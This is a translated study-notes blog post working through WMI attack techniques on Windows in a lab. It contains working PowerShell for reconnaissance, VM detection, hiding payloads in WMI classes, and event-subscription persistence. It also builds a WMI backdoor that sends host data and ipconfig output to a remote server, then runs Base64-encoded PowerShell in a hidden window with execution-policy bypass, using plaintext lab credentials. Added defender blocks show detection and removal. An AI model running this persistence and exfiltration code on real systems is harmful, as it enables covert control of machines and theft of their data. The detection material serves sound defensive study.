Windows WMI Analysis and Application (Part 1)

Keywords: Windows, persistence, vulnerability. Status: in progress

Reference links:

WMI Attacks

https://wooyun.x10sec.org/static/drops/tips-8189.html [Original article by 三好学生, first published on WooYun Drops]

WMI Backdoor

https://wooyun.x10sec.org/static/drops/tips-8260.html [Original article by 三好学生, first published on WooYun Drops]

WMI Defense

https://wooyun.js.org/drops/WMI Defense.html [Original article by 三好学生; original URL: http://drops.wooyun.org/tips/8290]

Related WMI content

https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe

WSC, JSRAT and WMI Backdoor

https://wooyun.x10sec.org/static/drops/tips-15575.html

0x00 Preface

Reading about something a thousand times is worth less than trying it once. This post is my study and hands-on testing record of 三好学生's original WMI article series, kept purely as learning notes. The original articles are linked above.

0x01 WMI Attacks with PowerShell

Environment

  • Current environment: Windows 10; PowerShell v3 or later is required

Related commands: information gathering

Operating system information

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
SystemDirectory : C:\Windows\system32
Organization    :
RegisteredUser  : Windows 用户

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Domain              : WORKGROUP
Manufacturer        : VMware, Inc.
Name                : DESKTOP-78M3Q0H
PrimaryOwnerName    : Windows 用户
TotalPhysicalMemory : 8588869632

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
Version           : INTEL  - 6040000

File/directory listing

Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile

Disk volume listing

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume|findstr "Caption"
Caption                      : C:\
Caption                      : E:\
Caption                      : \\?\Volume{6e506627-7001-4ecc-a1fb-bf533c7cae23}\
Caption                      : G:\

Registry operations (untested)

Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

Current processes

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

Enumerate services

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service

Event logs

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

Logged-on accounts

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser

__GENUS          : 2
__CLASS          : Win32_LoggedOnUser
__SUPERCLASS     : CIM_Dependency
__DYNASTY        : CIM_Dependency
__RELPATH        : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
__PROPERTY_COUNT : 2
__DERIVATION     : {CIM_Dependency}
__SERVER         : DESKTOP-78M3Q0H
__NAMESPACE      : ROOT\CIMV2
__PATH           : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
Antecedent       : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent        : \\.\root\cimv2:Win32_LogonSession.LogonId="183715"
PSComputerName   : DESKTOP-78M3Q0H

__GENUS          : 2
__CLASS          : Win32_LoggedOnUser
__SUPERCLASS     : CIM_Dependency
__DYNASTY        : CIM_Dependency
__RELPATH        : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
__PROPERTY_COUNT : 2
__DERIVATION     : {CIM_Dependency}
__SERVER         : DESKTOP-78M3Q0H
__NAMESPACE      : ROOT\CIMV2
__PATH           : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
Antecedent       : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent        : \\.\root\cimv2:Win32_LogonSession.LogonId="183625"
PSComputerName   : DESKTOP-78M3Q0H

Shares

Name   Path       Description
----   ----       -----------
ADMIN$ C:\Windows 远程管理
C$     C:\        默认共享
E$     E:\        默认共享
IPC$              远程 IPC

Installed hotfixes

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

Source        Description      HotFixID      InstalledBy          InstalledOn
------        -----------      --------      -----------          -----------
DESKTOP-78... Security Update  KB4570334                          2020/9/27 0:00:00
DESKTOP-78... Security Update  KB4577266                          2020/9/27 0:00:00

Antivirus software

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run>  Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

__GENUS                  : 2
__CLASS                  : AntiVirusProduct
__SUPERCLASS             :
__DYNASTY                : AntiVirusProduct
__RELPATH                : AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
__PROPERTY_COUNT         : 6
__DERIVATION             : {}
__SERVER                 : DESKTOP-78M3Q0H
__NAMESPACE              : ROOT\SecurityCenter2
__PATH                   : \\DESKTOP-78M3Q0H\ROOT\SecurityCenter2:AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
displayName              : Windows Defender
instanceGuid             : {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
pathToSignedProductExe   : windowsdefender://
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
productState             : 397568
timestamp                : Fri, 25 Jun 2020 01:35:57 GMT
PSComputerName           : DESKTOP-78M3Q0H

Application: virtual machine detection

Check physical memory and logical processor count (this seems unreliable!)

$VMDetected = $False
$Arguments = @{Class = 'Win32_ComputerSystem';Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'}
if (Get-WmiObject @Arguments) { $VMDetected = $True;"In vm"} else{"Not in vm"}

Check for VMware artifacts (network adapter, BIOS serial number, vmtoolsd.exe process)

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True ;"in vm"} else{"not in vm"}

Application: storing a payload in a WMI class [requires administrator privileges]

Store

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

Path          : \\DESKTOP-78M3Q0H\ROOT\cimv2:Win32_EvilClass
RelativePath  : Win32_EvilClass
Server        : DESKTOP-78M3Q0H
NamespacePath : ROOT\cimv2
ClassName     : Win32_EvilClass
IsClass       : True
IsInstance    : False
IsSingleton   : False

Read

PS C:\Windows\system32> ([WmiClass] 'Win32_EvilClass').Properties['EvilProperty']

Name       : EvilProperty
Value      : This is payload
Type       : String
IsLocal    : True
IsArray    : False
Origin     : Win32_EvilClass
Qualifiers : {CIMTYPE}
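Added defender-side example (not code from this post or from 三好学生's articles): a hunt for classes parked in a namespace the way Win32_EvilClass is above. The function name Find-StaticWmiClasses and its heuristic are this example's own assumptions: a provider-backed class carries the 'dynamic' or 'provider' qualifier and a base class is 'abstract', whereas a class written with ManagementClass.Put() is neither, and any default value on its properties lives in the WMI repository itself. Baseline the output on a clean host first, since a few legitimate non-provider classes also carry defaults.

```powershell
# Added example (not from the original post): look for data stored in a WMI
# namespace the way Win32_EvilClass is above. Heuristic (an assumption of this
# example): a provider-backed class has the 'dynamic' or 'provider' qualifier,
# a base class is 'abstract'; a class written with ManagementClass.Put() is
# neither, and any default value on its properties is kept in the repository.
function Find-StaticWmiClasses {
    param(
        [string]$Namespace = 'root\cimv2',
        [string[]]$KnownGood = @()      # class names already baselined on a clean host
    )
    Get-WmiObject -Namespace $Namespace -List | ForEach-Object {
        $cls = $_
        if ($cls.Name -like '__*' -or $KnownGood -contains $cls.Name) { return }
        $quals = @($cls.Qualifiers | ForEach-Object { $_.Name })
        if ($quals -contains 'dynamic' -or $quals -contains 'provider' -or $quals -contains 'abstract') { return }

        # Only properties with a non-empty default value can carry stored data.
        $stored = @($cls.Properties | Where-Object { $null -ne $_.Value -and "$($_.Value)" -ne '' })
        foreach ($p in $stored) {
            $v = "$($p.Value)"
            [pscustomobject]@{
                Class       = $cls.Name
                Property    = $p.Name
                Type        = $p.Type
                Length      = $v.Length
                LooksBase64 = ($v -match '^[A-Za-z0-9+/]{40,}={0,2}$')   # encoded payloads stand out
                Preview     = $v.Substring(0, [Math]::Min(60, $v.Length))
            }
        }
    }
}

# Example run: classes in root\cimv2 that are neither provider-backed nor
# abstract yet hold default values (Win32_EvilClass / EvilProperty above would appear here).
Find-StaticWmiClasses -Namespace 'root\cimv2' | Format-Table -AutoSize
```

Compare the result against the same run on a known-clean build of the same Windows version and feed the legitimate names back in through -KnownGood.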

Application: covert timed program launch [requires administrator privileges]

One-liner

$filterName = 'BotFilter82';$consumerName = 'BotConsumer23';$exePath = 'C:\Windows\System32\notepad.exe';$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop;$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath};Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

Multi-line

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

Result

__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"",Filter="
                          __EventFilter.Name=\"BotFilter82\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-78M3Q0H
__NAMESPACE             : ROOT\subscription
__PATH                  : \\DESKTOP-78M3Q0H\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsu
                          mer.Name=\"BotConsumer23\"",Filter="__EventFilter.Name=\"BotFilter82\""
Consumer                : CommandLineEventConsumer.Name="BotConsumer23"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : __EventFilter.Name="BotFilter82"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-78M3Q

Application: WMI backdoor detection and removal [requires administrator privileges]

  • View the current WMI event subscriptions

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

  • Remove the backdoor

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

  • Other ways to inspect the subscriptions (anything that can talk to the WMI repository)

vbs
mof
C/C++ via IWbem* COM API
.NET System.Management classes

Check the event logs:

Microsoft-Windows-WinRM/Operational
Microsoft-Windows-WMI-Activity/Operational
Microsoft-Windows-DistributedCOM
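Added example, not from the original post or the articles it follows: a report that resolves every binding in root\subscription to its filter query and consumer action and flags the patterns used by the persistence above (encoded PowerShell in a CommandLineEventConsumer, an inline ActiveScriptEventConsumer script, the Win32_PerfFormattedData_PerfOS_System polling query used as a timer), then pulls event ID 5861 from Microsoft-Windows-WMI-Activity/Operational, which records each new permanent subscription on Windows 10 / Server 2016 and later. The function names and the suspicion heuristics are assumptions of this example; it also covers the timed consumer built in 0x02 step 5 below.

```powershell
# Added example (not from the original post): enumerate every permanent WMI
# event subscription, resolve each binding to its filter query and consumer
# action, and flag the patterns used by the persistence technique above.
function Get-WmiSubscriptionReport {
    param([string]$ComputerName = '.')
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -ComputerName $ComputerName -Namespace $ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # A binding holds object paths such as __EventFilter.Name="BotFilter82"
        $filterName   = ([regex]'Name="([^"]+)"').Match([string]$b.Filter).Groups[1].Value
        $consumerName = ([regex]'Name="([^"]+)"').Match([string]$b.Consumer).Groups[1].Value
        $f = $filters   | Where-Object { $_.Name -eq $filterName }   | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $consumerName } | Select-Object -First 1

        # The action lives in ExecutablePath/CommandLineTemplate for a
        # CommandLineEventConsumer, or ScriptText/ScriptFileName for an
        # ActiveScriptEventConsumer.
        $type   = if ($c) { $c.__CLASS } else { '(consumer missing)' }
        $action = ''
        if ($type -eq 'CommandLineEventConsumer') {
            $action = "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim()
        } elseif ($type -eq 'ActiveScriptEventConsumer') {
            $action = if ($c.ScriptText) { $c.ScriptText } else { "file: $($c.ScriptFileName)" }
        }
        $query = if ($f) { $f.Query } else { '(filter missing)' }

        # Heuristics (assumptions of this example), matched case-insensitively.
        $reasons = @()
        if ($action -match 'powershell.*\s-(e|ec|enc|encodedcommand)\s') { $reasons += 'encoded PowerShell command' }
        if ($action -match '-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass') { $reasons += 'hidden window / policy bypass switches' }
        if ($type -eq 'ActiveScriptEventConsumer' -and $c.ScriptText) { $reasons += 'inline script body' }
        if ($query -match '__InstanceModificationEvent.*Win32_PerfFormattedData_PerfOS_System') { $reasons += 'perf-counter polling used as a timer' }
        if ($query -match '__TimerEvent|Win32_LocalTime') { $reasons += 'time-based trigger' }

        [pscustomobject]@{
            Filter       = $filterName
            Query        = $query
            ConsumerType = $type
            Consumer     = $consumerName
            Action       = $action
            Suspicious   = ($reasons.Count -gt 0)
            Reasons      = ($reasons -join '; ')
        }
    }
}

# Corroborate with the WMI-Activity log: event ID 5861 is written for every
# new permanent event consumer registration (Windows 10 / Server 2016 and later).
function Get-WmiSubscriptionEvents {
    param([int]$Days = 30)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-WMI-Activity/Operational'
        Id        = 5861
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

Get-WmiSubscriptionReport | Format-List
Get-WmiSubscriptionEvents | Format-List
```

Where Sysmon is deployed, the same registrations also appear as Sysmon event IDs 19, 20 and 21 (WmiEventFilter, WmiEventConsumer and WmiEventConsumerToFilter activity), which gives a second record if the WMI-Activity log has been cleared.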

0x02 Advanced WMI Techniques: WMI Backdoor

  • Test environment

Server (listening side):
172.16.1.201
win2012x64
username: administrator
password: 1qaz!QAZ

Client (controlled host):
172.16.1.211
win10x64
  • Step 1: the client collects host configuration, connects to the remote server and stores the data there (run on the client)
#connect to 172.16.1.201
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
#set the new class name
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
#collect host configuration
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#note: the newline escape sequence in PowerShell is `n
$EvilClass.Properties['IP172161211'].Value =$GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
#store the class on the remote server
$EvilClass.Put()
  • Step 1: result (run on the client)
Path          : \\172.16.1.201\root\cimv2:Win32_UserInfo
RelativePath  : Win32_UserInfo
Server        : 172.16.1.201
NamespacePath : root\cimv2
ClassName     : Win32_UserInfo
IsClass       : True
IsInstance    : False
IsSingleton   : False
  • Step 2: query (run on the server)
([WmiClass]'Win32_UserInfo').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass]'Win32_UserInfo').Properties['IP172161211']

Name       : IP172161211
Value      : MAKAPAKA\Dev1
             OS:Microsoft Windows 10 专业版;64 位
             AntiVirusProduct:Windows Defender
             Process:
             System Idle Process System Registry smss.exe csrss.exe csrss.exe wininit.exe winlogon.exe services.exe lsa
             ss.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe
              svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression sv
             chost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe vmtoolsd.exe vm3dservice.exe VGAuthS
             ervice.exe MsMpEng.exe vm3dservice.exe svchost.exe dllhost.exe WmiPrvSE.exe msdtc.exe NisSrv.exe MoUsoCore
             Worker.exe svchost.exe dasHost.exe svchost.exe sihost.exe svchost.exe taskhostw.exe ctfmon.exe explorer.ex
             e ChsIME.exe svchost.exe SearchIndexer.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe Run
             timeBroker.exe TextInputHost.exe RuntimeBroker.exe dllhost.exe SecurityHealthSystray.exe SecurityHealthSer
             vice.exe vmtoolsd.exe cmd.exe conhost.exe MusNotifyIcon.exe OneDrive.exe SgrmBroker.exe uhssvc.exe svchost
             .exe ApplicationFrameHost.exe svchost.exe powershell.exe powershell.exe conhost.exe svchost.exe Microsoft.
             Photos.exe RuntimeBroker.exe WmiPrvSE.exe svchost.exe RuntimeBroker.exe smartscreen.exe ChsIME.exe audiodg
             .exe
             Service Start:
             Appinfo AppXSvc AudioEndpointBuilder Audiosrv BFE BrokerInfrastructure BTAGService BthAvctpSvc bthserv CDP
             Svc COMSysApp CoreMessagingRegistrar CryptSvc DcomLaunch DeviceAssociationService Dhcp DiagTrack DispBroke
             rDesktopSvc Dnscache DoSvc DPS DsSvc DusmSvc EventLog EventSystem fdPHost FDResPub FontCache InstallServic
             e iphlpsvc KeyIso LanmanServer LanmanWorkstation LicenseManager lmhosts LSM mpssvc MSDTC NcbService Netlog
             on netprofm NlaSvc nsi PcaSvc PlugPlay Power ProfSvc RasMan RmSvc RpcEptMapper RpcSs SamSs Schedule Securi
             tyHealthService SEMgrSvc SENS SgrmBroker ShellHWDetection SmsRouter Spooler SSDPSRV SstpSvc StateRepositor
             y StorSvc SysMain SystemEventsBroker TabletInputService Themes TimeBrokerSvc TokenBroker TrkWks uhssvc Use
             rManager UsoSvc VaultSvc VGAuthService vm3dservice VMTools W32Time WaaSMedicSvc Wcmsvc WdiServiceHost WdiS
             ystemHost WdNisSvc WinDefend WinHttpAutoProxySvc Winmgmt WpnService wscsvc WSearch wuauserv cbdhsvc_c66fa
             CDPUserSvc_c66fa OneSyncSvc_c66fa PimIndexMaintenanceSvc_c66fa UnistoreSvc_c66fa UserDataSvc_c66fa WpnUser
             Service_c66fa
Type       : String
IsLocal    : True
IsArray    : False
Origin     : Win32_UserInfo
Qualifiers : {CIMTYPE}
  • Step 3: the client fetches the instruction and executes it
The client Base64-encodes and stores the instruction
The client reads, decodes and executes the instruction

Client-side code

  1. The client Base64-encodes and stores the instruction (requires elevated privileges)

    #define the payload; use a single-quoted here-string so the variables are kept literal instead of being expanded here
    $Payload=@'
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $EvilClass.Properties['IP172161211'].Value ="Run Command Test!" 
    $EvilClass.Put() 
    '@
    #Base64-encode the payload (UTF-16LE, which is what powershell -enc expects)
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Payload);
    $EncodedPayload = [System.Convert]::ToBase64String($bytes); 
    #store the encoded payload
    $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
    $StaticClass.Name = 'Win32_Command'
    $StaticClass.Put()
    $StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
    $StaticClass.Put()
    

    Tip:

    Base64 conversion

    $a = ipconfig /all
    $b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($a))
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b))
    

    The client encodes and stores the instruction, this time with command execution (requires elevated privileges)

    #define the payload; use a single-quoted here-string so the variables are kept literal instead of being expanded here
    $Payload=@'
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $command = ipconfig /all
    $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command)) 
    $EvilClass.Put() 
    '@
    #Base64-encode the payload (UTF-16LE, which is what powershell -enc expects)
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Payload);
    $EncodedPayload = [System.Convert]::ToBase64String($bytes); 
    #store the encoded payload
    $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
    $StaticClass.Name = 'Win32_Command'
    $StaticClass.Put()
    $StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
    $StaticClass.Put()
    

    Base64-encoding the command output

    $command = ipconfig /all
    $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
    

    Base64 decoding on the server

    $result=([WmiClass] 'Win32_CommandTest').Properties['IP172161211'].Value
    [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
    

    Result

    PS C:\Users\admin> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
     Windows IP 配置     主机名  . . . . . . . . . . . . . : DevC1    主 DNS 后缀 . . . . . . . . . . . : makapaka.garden
      节点类型  . . . . . . . . . . . . : 混合    IP 路由已启用 . . . . . . . . . . : 否    WINS 代理已启用 . . . . . . . .
     . : 否    DNS 后缀搜索列表  . . . . . . . . : makapaka.garden                                        localdomain  以太
    网适配器 Ethernet0:     连接特定的 DNS 后缀 . . . . . . . : localdomain    描述. . . . . . . . . . . . . . . : Intel(R)
     82574L Gigabit Network Connection    物理地址. . . . . . . . . . . . . : 00-0C-29-6B-36-09    DHCP 已启用 . . . . . .
    . . . . . : 是    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地址. . . . . . . . : fe80::95a8:a9a1:1c42:66
    bb%9(首选)     IPv4 地址 . . . . . . . . . . . . : 192.168.235.135(首选)     子网掩码  . . . . . . . . . . . . : 255.25
    5.255.0    获得租约的时间  . . . . . . . . . : 2020年6月28日 9:28:06    租约过期的时间  . . . . . . . . . : 2020年6月28
    日 11:43:06    默认网关. . . . . . . . . . . . . : 192.168.235.2    DHCP 服务器 . . . . . . . . . . . : 192.168.235.254
        DHCPv6 IAID . . . . . . . . . . . : 100666409    DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-
    29-6B-36-09    DNS 服务器  . . . . . . . . . . . : 192.168.235.2    主 WINS 服务器  . . . . . . . . . : 192.168.235.2
      TCPIP 上的 NetBIOS  . . . . . . . : 已启用  以太网适配器 Ethernet1:     连接特定的 DNS 后缀 . . . . . . . :     描述.
     . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2    物理地址. . . . . . . . . . . . . : 00-
    0C-29-6B-36-13    DHCP 已启用 . . . . . . . . . . . : 否    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地
    址. . . . . . . . : fe80::3419:de22:d5d:d52d%13(首选)     IPv4 地址 . . . . . . . . . . . . : 172.16.1.211(首选)     子
    网掩码  . . . . . . . . . . . . : 255.255.255.0    默认网关. . . . . . . . . . . . . : 172.16.1.201    DHCPv6 IAID . .
    . . . . . . . . . : 419433513    DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-29-6B-36-09    DNS
    服务器  . . . . . . . . . . . : 172.16.1.201    TCPIP 上的 NetBIOS  . . . . . . . : 已启用  以太网适配器 蓝牙网络连接:
        媒体状态  . . . . . . . . . . . . : 媒体已断开连接    连接特定的 DNS 后缀 . . . . . . . :     描述. . . . . . . . .
     . . . . . . : Bluetooth Device (Personal Area Network)    物理地址. . . . . . . . . . . . . : A8-7E-EA-E9-D7-06    DHC
    P 已启用 . . . . . . . . . . . : 是    自动配置已启用. . . . . . . . . . : 
    

    Result

    PS C:\Windows\system32> $StaticClass.Put()
    
    Path          : \\DEVC1\ROOT\cimv2:Win32_Command
    RelativePath  : Win32_Command
    Server        : DEVC1
    NamespacePath : ROOT\cimv2
    ClassName     : Win32_Command
    IsClass       : True
    IsInstance    : False
    IsSingleton   : False
    
  2. The client views the encoded payload

    ([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    

    Result

    PS C:\Windows\system32> ([WmiClass] 'Win32_Command').Properties['EnCommand']
    
    Name       : EnCommand
    Value      : <Base64 string omitted; it decodes to the script shown under step 3>
    Type       : String
    IsLocal    : True
    IsArray    : False
    Origin     : Win32_Command
    Qualifiers : {CIMTYPE}
    
  3. The client reads, decodes and executes the instruction

    #read the encoded payload
    $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    #run it through PowerShell
    $PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload"
    Invoke-WmiMethod  -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
    #display the decoded instruction
    $bytes2  = [System.Convert]::FromBase64String($EncodedPayload);
    $decoded = [System.Text.Encoding]::Unicode.GetString($bytes2); 
    "decoded Payload:"
    $decoded
    
    PS C:\Windows\system32> $decoded
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $EvilClass.Properties['IP172161211'].Value ="Run Command Test!"
